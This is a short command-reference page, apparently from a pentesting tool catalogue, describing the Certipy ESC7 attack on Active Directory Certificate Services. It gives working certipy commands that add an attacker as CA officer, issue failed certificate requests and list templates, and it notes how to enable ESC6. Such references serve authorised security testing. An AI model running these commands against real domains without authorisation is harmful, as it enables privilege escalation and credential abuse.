Certipy ESC7 (Vulnerable CA Access Rights)

ESC7: you have ManageCA or ManageCertificates on the CA. Add yourself as an officer, approve a previously failed request, or issue a new cert. Also lets you flip CA flags such as EDITF_ATTRIBUTESUBJECTALTNAME2 to enable ESC6.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
RPC, LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -add-officer '<user>'

Credential variants

The same attack using a different authentication material.

Issue Failed Request requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -issue-request <request-id>

List Templates requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -list-templates

Examples

certipy ca -u jdoe@corp.local -p Pass -dc-ip 10.10.10.10 -ca CORP-CA -add-officer jdoe

Tags

certipy adcs esc7 manage-ca

References